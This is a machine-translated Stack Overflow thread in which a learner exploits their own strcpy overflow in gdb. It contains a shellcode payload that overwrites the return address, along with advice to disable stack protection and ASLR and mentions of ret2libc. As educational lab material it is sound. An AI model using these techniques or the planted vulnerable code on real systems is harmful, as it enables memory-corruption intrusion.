C 如何绕过返回地址覆盖而不重定向控制流？_C_Gcc_Assembly_Stack Overflow_Buffer Overflow

C 如何绕过返回地址覆盖而不重定向控制流？

c gcc assembly

C 如何绕过返回地址覆盖而不重定向控制流？,c,gcc,assembly,stack-overflow,buffer-overflow,C,Gcc,Assembly,Stack Overflow,Buffer Overflow,让我在这里举例说明这个问题这是主要的 (gdb) disass main Dump of assembler code for function main: 0x000000000040057c <+0>: push rbp 0x000000000040057d <+1>: mov rbp,rsp 0x0000000000400580 <+4>: sub rsp,0x40 0x0000000000400584 <

让我在这里举例说明这个问题

这是主要的

(gdb) disass main

Dump of assembler code for function main:
   0x000000000040057c <+0>: push   rbp
   0x000000000040057d <+1>: mov    rbp,rsp
   0x0000000000400580 <+4>: sub    rsp,0x40
   0x0000000000400584 <+8>: mov    DWORD PTR [rbp-0x34],edi
   0x0000000000400587 <+11>:    mov    QWORD PTR [rbp-0x40],rsi
   0x000000000040058b <+15>:    mov    rax,QWORD PTR [rbp-0x40]
   0x000000000040058f <+19>:    add    rax,0x8
   0x0000000000400593 <+23>:    mov    rdx,QWORD PTR [rax]
   0x0000000000400596 <+26>:    lea    rax,[rbp-0x30]
   0x000000000040059a <+30>:    mov    rsi,rdx
   0x000000000040059d <+33>:    mov    rdi,rax
   0x00000000004005a0 <+36>:    call   0x400430 <strcpy@plt>
   0x00000000004005a5 <+41>:    mov    eax,0x0
   0x00000000004005aa <+46>:    call   0x400566 <function>
   0x00000000004005af <+51>:    mov    eax,0x0
   0x00000000004005b4 <+56>:    leave  
   0x00000000004005b5 <+57>:    ret    
End of assembler dump.

(gdb) list

#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}

攻击者显然试图溢出数组“a”指定的缓冲区

让我们更深入地研究一下当我运行该漏洞时堆栈的外观

(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9   function();
(gdb) i r rbp
rbp            0x7fffffffdc10   0x7fffffffdc10
(gdb) i r rsp
rsp            0x7fffffffdbd0   0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8  0x00007fff  0x0040060d  0x00000002
0x7fffffffdbe0: 0x315915eb  0x3104b0c0  0x31c3ffdb  0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080  0xe880cdcb  0xffffffe6  0x6c6c6548
0x7fffffffdc00: 0x771f2c6f  0x646c726f  0x21212121  0x21212121
0x7fffffffdc10: 0x00400566  0x00000000
(gdb)

受影响的缓冲区从0x7FFFFFDBE0开始，到0x7FFFFFDC10结束

外壳代码平滑地注入，为了使事情更简单，我用函数的返回地址覆盖返回地址。也就是说，我实际上使用0x400566作为返回地址，因此如果一切顺利，它只需调用函数并打印“test”。您可以从程序集转储中清楚地看到函数“function”的地址

预期输出：“testtest”

实际输出：test（程序已经调用了该函数）。

我认为您在防止缓冲区溢出的GCC的StackGuard保护方面遇到了问题

尝试使用

-fno-stack-protector

标记以禁用对程序的保护

假设您在Linux上运行它，如果您想禁用基于内核的保护（称为地址空间随机化），您可以运行：

sysctl -w kernel.randomize_va_space=0

二进制文件没有金丝雀，它显示在程序集转储中。禁用地址空间随机化没有明显的效果。地址空间随机化不是金丝雀，而是在虚拟内存中随机放置数据区域的过程。这是一个强化执行缓冲区溢出/堆溢出过程的技巧，因为它不会连续放置给定进程的堆、堆栈和库。@GabrielReyes:GDB已经对在GDB内部启动的进程禁用ASLR。您是对的，

-fstack protector

已经被禁用，或者至少没有保护这个功能，所以假设您在GDB中运行测试，这些建议都不会有什么不同。（你应该这样做，这样你就可以单步执行！）我通过更改被覆盖的地址旁边的地址来解决这个问题，因为我只是在覆盖rbp，返回地址没有改变。是什么让你认为编译器生成的代码正在检测（并静默地修复！）缓冲区溢出？请注意，

strcpy

在第一个

\0

处停止，因此它只复制负载末尾的一个

\x00\x00\x00\x00\x00

字节。幸运的是，您仍然在上面的dword

0x00400566

中得到了

，也就是说，

0x00400566

在堆栈上作为一个qword，但是您是否检查了返回地址的正确位置？最可能的情况是，您根本没有覆盖返回地址，因为程序是按编写的方式运行的。设置一个断点并使用

stepi

我在意识到手头的实际问题后重新命名了标题，我对这种材料仍然非常陌生，甚至在使用了32位二进制文件后，我设法修复了它。如果你在

ret

指令上设置了一个断点，你就可以很容易地看到

$rsp

指向的地方。（顺便说一句，由于

\0

停止

strcpy

和其他基于字符串的溢出，这只会起作用，因为现有的返回地址具有与所需地址相同的高32位，并且在正确的位置有零。在返回库代码（如libc中的

system（）

）的情况下，会发生这样的ret2code攻击在x86-64中，由于寄存器中的零，使用有用的参数比较困难。相关：ret2reg，其中目标序列是a

jmp reg

）

sysctl -w kernel.randomize_va_space=0